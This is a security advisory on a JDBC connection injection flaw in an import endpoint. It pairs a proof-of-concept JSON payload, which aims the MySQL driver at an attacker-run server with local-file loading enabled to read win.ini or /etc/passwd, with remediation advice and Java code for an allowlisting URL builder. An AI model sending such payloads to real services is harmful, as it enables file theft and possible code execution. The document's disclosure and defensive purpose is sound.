### Key Information Summary

#### Vulnerability Type

- **JDBC Connection Injection**

#### Description

- In the `importChanel` endpoint of `ImportDataController`, the application accepts user-controlled `DataSourceSqlParams` objects.
- The user-controlled `driverClassName` and `url` parameters are passed directly to `DriverManagerDataSource` to establish a database connection.
- Because neither the JDBC URL nor the driver class name is validated, attackers can exploit this vulnerability to:
  1. **Arbitrary File Read**: By specifying the MySQL driver and connecting to an attacker-controlled "malicious MySQL Server", attackers can leverage the `LOAD DATA LOCAL INFILE` feature of the MySQL protocol to make the client read and upload arbitrary local files, such as `/etc/passwd` or `C:/Windows/win.ini`.
  2. **Remote Code Execution (RCE)**: If the H2 database, SQLite, or MySQL drivers vulnerable to deserialization are present on the classpath, attackers can craft specific JDBC URLs (e.g., H2's `RUNSCRIPT` command) to execute system commands.

#### Impact

- **Confidentiality Loss**: Attackers can read sensitive configuration files, source code, system files, and credential files, leading to exposure of core secrets.
- **Integrity Loss**: In the presence of H2, SQLite, or specific deserialization gadget chains, the attack can escalate to RCE, enabling file system modification, backdoor implantation, or tampering with database records.
- **Availability Loss**: Attackers can exhaust service resources via RCE or repeated malicious connections, leading to service shutdown or deletion of critical data.

#### Proof of Concept

- Requires running a malicious Python script to simulate a MySQL server, instructing the victim system to read the file `C:/windows/win.ini`.
- Sample HTTP POST request and JSON payload:

  ```json
  {
    "driverClassName": "com.mysql.cj.jdbc.Driver",
    "url": "jdbc:mysql://1.2.3.4:3306/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true",
    "username": "any_user",
    "password": "any_password",
    "sql": "select 1"
  }
  ```

- The arbitrary file read vulnerability was successfully verified.

#### Remediation Measures

- **Prohibit User-Controlled Driver Classes**: Do not accept a user-supplied `driverClassName`; hardcode the allowed driver class names in backend logic.
- **Remove Full URL Control**: Instead of using the raw `url` string, accept `host`, `port`, and `database` separately, and construct the JDBC URL on the backend.
- **Implement Parameter Whitelisting**: Strictly validate or remove dangerous parameters (e.g., `allowLoadLocalInfile`, `autoDeserialize`, `INIT`) when building the URL.
- **Principle of Least Privilege**: Ensure the system user running the Java application has no filesystem access to sensitive directories.
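The following is an added example of the first three remediation measures combined; it is not code from the audited project. It fixes the driver class as a constant, takes `host`, `port` and `database` as separate fields, and builds the JDBC URL itself with an allowlist of connection properties, so the `allowLoadLocalInfile` / `allowUrlInLocalInfile` switches from the PoC payload can never reach the driver. The class name `SafeJdbcUrlBuilder`, the `build` method and the three allowlisted properties (`connectTimeout`, `socketTimeout`, `serverTimezone`) are assumptions for the example; the resulting string is what would be handed to `DriverManagerDataSource.setUrl`, with `setDriverClassName` receiving the constant.

```java
import java.util.Locale;
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Server-side construction of the MySQL JDBC URL for the import endpoint.
 * Added example, not code from the audited project. The driver class is a
 * constant, the request supplies only host/port/database plus an optional
 * property map, and every property passes an allowlist before it can reach
 * the URL. DriverManagerDataSource should only ever receive the value built here.
 */
public final class SafeJdbcUrlBuilder {

    /** The only driver this endpoint will load; never read from the request body. */
    public static final String DRIVER_CLASS = "com.mysql.cj.jdbc.Driver";

    // Hostname / IPv4 labels only: no scheme, no '?', '&', '=' or '/' can get in.
    private static final Pattern HOST = Pattern.compile(
        "^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
      + "(\\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$");
    private static final Pattern DB_NAME = Pattern.compile("^[A-Za-z0-9_]{1,64}$");
    private static final Pattern PROP_VALUE = Pattern.compile("^[A-Za-z0-9_/+.-]{1,64}$");

    /**
     * Lower-cased request key -> canonical Connector/J property name.
     * Anything not in this map (allowLoadLocalInfile, allowUrlInLocalInfile,
     * autoDeserialize, ...) is rejected rather than silently dropped.
     * The three entries are an assumed, deliberately small allowlist.
     */
    private static final Map<String, String> ALLOWED_PROPS = Map.of(
        "connecttimeout", "connectTimeout",
        "sockettimeout",  "socketTimeout",
        "servertimezone", "serverTimezone");

    private SafeJdbcUrlBuilder() {}

    public static String build(String host, int port, String database,
                               Map<String, String> requestedProps) {
        if (host == null || !HOST.matcher(host).matches()) {
            throw new IllegalArgumentException("invalid host");
        }
        if (port < 1 || port > 65535) {
            throw new IllegalArgumentException("invalid port");
        }
        if (database == null || !DB_NAME.matcher(database).matches()) {
            throw new IllegalArgumentException("invalid database name");
        }

        StringBuilder url = new StringBuilder("jdbc:mysql://")
            .append(host).append(':').append(port).append('/').append(database)
            // Pin the file-read and deserialization switches off explicitly,
            // whatever the caller asked for and whatever the driver default is.
            .append("?allowLoadLocalInfile=false")
            .append("&allowUrlInLocalInfile=false")
            .append("&autoDeserialize=false");

        for (Map.Entry<String, String> e : requestedProps.entrySet()) {
            String canonical = ALLOWED_PROPS.get(e.getKey().toLowerCase(Locale.ROOT));
            if (canonical == null) {
                throw new IllegalArgumentException("property not allowed: " + e.getKey());
            }
            if (e.getValue() == null || !PROP_VALUE.matcher(e.getValue()).matches()) {
                throw new IllegalArgumentException("bad value for " + canonical);
            }
            url.append('&').append(canonical).append('=').append(e.getValue());
        }
        return url.toString();
    }

    public static void main(String[] args) {
        // Well-formed request: structural fields plus one allowlisted property.
        System.out.println(build("db.internal.example", 3306, "imports",
                                 Map.of("connectTimeout", "5000")));

        // The PoC's dangerous property is refused instead of being forwarded.
        try {
            build("1.2.3.4", 3306, "test", Map.of("allowLoadLocalInfile", "true"));
        } catch (IllegalArgumentException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }

        // A database name carrying URL syntax cannot smuggle extra parameters.
        try {
            build("1.2.3.4", 3306, "test?allowLoadLocalInfile=true", Map.of());
        } catch (IllegalArgumentException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }
    }
}
```

The host is still user-supplied, so the application may be made to open a connection to a server it does not trust; the value of pinning `allowLoadLocalInfile=false` is that the Connector/J client then declines the server's `LOAD DATA LOCAL INFILE` request regardless of who operates that server. Where the set of legitimate database hosts is known, an allowlist of hosts (or a lookup of pre-registered data sources by ID) is the stronger control and removes that residual risk entirely.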